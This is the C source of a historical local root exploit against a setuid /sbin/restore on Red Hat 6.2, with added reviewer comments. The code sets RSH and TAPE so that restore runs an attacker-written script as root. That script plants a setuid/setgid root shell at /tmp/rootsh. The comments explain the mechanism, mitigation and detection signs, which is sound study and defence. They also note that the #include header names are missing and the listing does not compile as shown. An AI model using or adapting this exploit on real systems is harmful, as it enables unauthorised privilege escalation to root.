/* (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo.org]. this is the counterpart to Mat's /sbin/dump exploit findings. it also can be applied on /sbin/restore i noticed. /sbin/restore has to be setuid root for this to successfully exploit, of course. -- so here goes. note: this was built and tested for the redhat 6.2 installation. */

/*
 * Reviewer notes (defensive reading of this historical listing):
 *
 *  - No memory corruption is involved.  The program depends entirely on a
 *    setuid-root restore honouring caller-supplied environment variables
 *    (RSH and TAPE are set below), so the "remote shell" helper that restore
 *    launches is a script the unprivileged caller wrote.  The mitigation is
 *    the general rule for privileged programs: never execute a program name
 *    taken from the untrusted environment, and do not install restore setuid
 *    when it is not needed.
 *
 *  - Observable artifacts: a script at /tmp/tmpsh (removed again after the
 *    run) and a copy of /bin/sh at /tmp/rootsh, chown'd to root:root and
 *    chmod'd 6755.  A root-owned setuid/setgid shell under /tmp is a reliable
 *    detection signal for this and similar techniques.
 *
 *  - The two #include lines below lost their header names during extraction
 *    (the angle-bracketed names were most likely swallowed as HTML tags);
 *    the listing does not compile as shown.  The code calls fprintf/fopen
 *    (stdio.h) and stat/chmod (sys/stat.h); setenv/exit/system and
 *    unlink/sleep are used without a visible declaration.
 */

#define PATH "/sbin/restore" // path to restore
#define TMPEXEC "/tmp/tmpsh" // the temporary file to execute.
#define SUIDSHELL "/tmp/rootsh" // where the rootshell will be located.

#include /* header name lost in extraction — NOTE(review): presumably <stdio.h> */
#include /* header name lost in extraction — NOTE(review): presumably <sys/stat.h> */

/* Implicit-int main (pre-C99 style).  Exit status: 0 when /tmp/rootsh ends up
 * setuid+setgid, 1 on any of the checks below failing. */
main(){
  char cmd[256],input[3];       /* cmd: shell command line; input: answers piped to restore */
  struct stat mod1,mod2;        /* mod1: stat of PATH; mod2: stat of SUIDSHELL afterwards */
  FILE *suidexec;               /* the helper script written to TMPEXEC */

  /* The format string has no conversion, so the trailing PATH argument is
   * simply ignored by fprintf. */
  fprintf(stderr,"[ (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo" ".org]. ]\n\n",PATH);

  /* Pre-flight: PATH must exist and have st_mode exactly 36333 (decimal),
   * which is 0106755 octal = S_IFREG | S_ISUID | S_ISGID | 0755 — i.e. a
   * regular file that is setuid and setgid.  An exact compare means any
   * other permission bits (or a non-setgid setuid binary) are rejected. */
  if(stat(PATH,&mod1)){
    fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
    exit(1);
  }
  else if(mod1.st_mode==36333){
    fprintf(stderr,"[*] %s appears to be setuid and setgid.\n",PATH);
  }
  else{
    fprintf(stderr,"[!] failed, %s doesn't appear to be setuid and setgid. (rh de" "fault)\n",PATH);
    exit(1);
  }

  /* Write the helper script that restore will later run in place of rsh.
   * NOTE(review): fopen()'s result is not checked, so a failure to create
   * TMPEXEC leads to fprintf on a NULL FILE*.  The script copies /bin/sh to
   * SUIDSHELL and makes it root-owned 6755 — this only has effect because the
   * script is executed with restore's root privileges. */
  fprintf(stderr,"[*] now making shell script to execute.\n");
  unlink(TMPEXEC);
  suidexec=fopen(TMPEXEC,"w");
  fprintf(suidexec,"#!/bin/sh\n");
  fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
  fprintf(suidexec,"chown root.root %s\n",SUIDSHELL);
  fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
  fclose(suidexec);
  /* 33261 decimal = 0100755 octal: regular file, mode 0755 (executable). */
  chmod(TMPEXEC,33261);

  /* Environment handed to restore.  RSH names the helper above; TAPE=":"
   * presumably makes restore treat the tape as remote so that it invokes
   * $RSH (TODO confirm against restore 0.4b15's argument parsing).
   * NOTE(review): input[] has not been written yet at this point — setenv()
   * copies the current, uninitialized contents of the buffer, which is
   * undefined behaviour. */
  fprintf(stderr,"[*] done, now setting up environmental variables.\n");
  setenv("INPUT",input,1);
  setenv("RSH",TMPEXEC,1);
  setenv("TAPE",":",1);

  /* Build and run "echo $INPUT | /sbin/restore -R", output discarded.
   * sizeof(input) is 3, so snprintf stores only "y\n" plus the terminator.
   * cmd is built solely from the compile-time PATH constant, so system() here
   * carries no untrusted input — the risk of this program is what it does,
   * not how it builds the command. */
  fprintf(stderr,"[*] done, now building and executing the command line.\n");
  snprintf(input,sizeof(input),"y\nn");
  snprintf(cmd,sizeof(cmd),"echo $INPUT | %s -R 1>/dev/null 2>&1",PATH);
  system(cmd);
  sleep(1);
  unlink(TMPEXEC);   /* helper script is removed; only SUIDSHELL remains as evidence */

  /* Post-check: SUIDSHELL must exist with st_mode == 36333 (0106755, see
   * above), i.e. the helper ran as root and the chown/chmod took effect. */
  fprintf(stderr,"[*] done, now checking for success.\n");
  if(stat(SUIDSHELL,&mod2)){
    fprintf(stderr,"[!] failed, %s doesn't exist.\n",SUIDSHELL);
    exit(1);
  }
  else if(mod2.st_mode==36333){
    fprintf(stderr,"[*] success, %s is now setuid and setgid.\n",SUIDSHELL);
  }
  else{
    fprintf(stderr,"[!] failed, %s exists, but doesnt appear to be setuid and set" "gid.\n",SUIDSHELL);
    exit(1);
  }
  fprintf(stderr,"[*] finished, everything appeared to have gone successful.\n");
  exit(0);
}